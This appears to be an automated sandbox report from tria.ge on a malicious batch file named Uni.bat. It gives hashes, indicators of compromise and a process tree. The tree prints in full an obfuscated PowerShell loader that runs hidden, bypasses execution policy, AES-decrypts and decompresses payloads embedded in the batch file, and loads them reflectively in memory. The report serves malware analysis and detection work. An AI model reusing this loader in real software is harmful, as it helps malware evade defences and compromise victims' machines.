Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
16s -
max time network
21s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-es -
resource tags
arch:x64arch:x86image:win10v2004-20230703-eslocale:es-esos:windows10-2004-x64systemwindows -
submitted
15/07/2023, 14:29
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win10v2004-20230703-es
General
-
Target
Uni.bat
-
Size
12.7MB
-
MD5
be62b93f5d396c3e0170e242524dd028
-
SHA1
99e4790126a772af2f29e065c1aef6063e8e12b8
-
SHA256
d6437638c72a39b34562e272d2e61f8f1408d50a0230341a7bacb675ca30c72f
-
SHA512
6705287c045c5c0991e528006798d8c26b8e69abe0250a87e1d24c1dea7c18d1e570d7b9b604a1546d50519fc2cf41e418c417b10310a38e0da0c53db32272bb
-
SSDEEP
49152:Z5irCQcDQZMpqSIvIS/Pb3M171APKQbmVROCoGnquAwJYdbgwk654lp0IZXApwFU:w
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 4508 Uni.bat.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4508 Uni.bat.exe 4508 Uni.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4508 Uni.bat.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2156 wrote to memory of 2012 2156 cmd.exe 88 PID 2156 wrote to memory of 2012 2156 cmd.exe 88 PID 2012 wrote to memory of 4000 2012 net.exe 89 PID 2012 wrote to memory of 4000 2012 net.exe 89 PID 2156 wrote to memory of 4508 2156 cmd.exe 96 PID 2156 wrote to memory of 4508 2156 cmd.exe 96
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:4000
-
-
-
C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AhdqY($Soqyo){ $GMrUJ=[System.Security.Cryptography.Aes]::Create(); $GMrUJ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GMrUJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GMrUJ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('n6ZNlJxqzpQ1XRiG2tuu1JmoHxwJc3mli81U2A8nQ9k='); $GMrUJ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QYZLgisbwIsxFzm0XsH2pQ=='); $sxZZG=$GMrUJ.CreateDecryptor(); $return_var=$sxZZG.TransformFinalBlock($Soqyo, 0, $Soqyo.Length); $sxZZG.Dispose(); $GMrUJ.Dispose(); $return_var;}function FhGev($Soqyo){ $lTYrn=New-Object System.IO.MemoryStream(,$Soqyo); $jNRyy=New-Object System.IO.MemoryStream; $CbFKP=New-Object System.IO.Compression.GZipStream($lTYrn, [IO.Compression.CompressionMode]::Decompress); $CbFKP.CopyTo($jNRyy); $CbFKP.Dispose(); $lTYrn.Dispose(); $jNRyy.Dispose(); $jNRyy.ToArray();}function CQPwX($Soqyo,$GqVhs){ $nPHkC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$Soqyo); $JxPGs=$nPHkC.EntryPoint; $JxPGs.Invoke($null, $GqVhs);}$EFkiG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($eFXlV in $EFkiG) { if ($eFXlV.StartsWith('SEROXEN')) { $dpUOE=$eFXlV.Substring(7); break; }}$OdrYv=[string[]]$dpUOE.Split('\');$UxsjS=FhGev (AhdqY ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OdrYv[0])));$mgxsE=FhGev (AhdqY ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OdrYv[1])));CQPwX $mgxsE (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));CQPwX $UxsjS (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82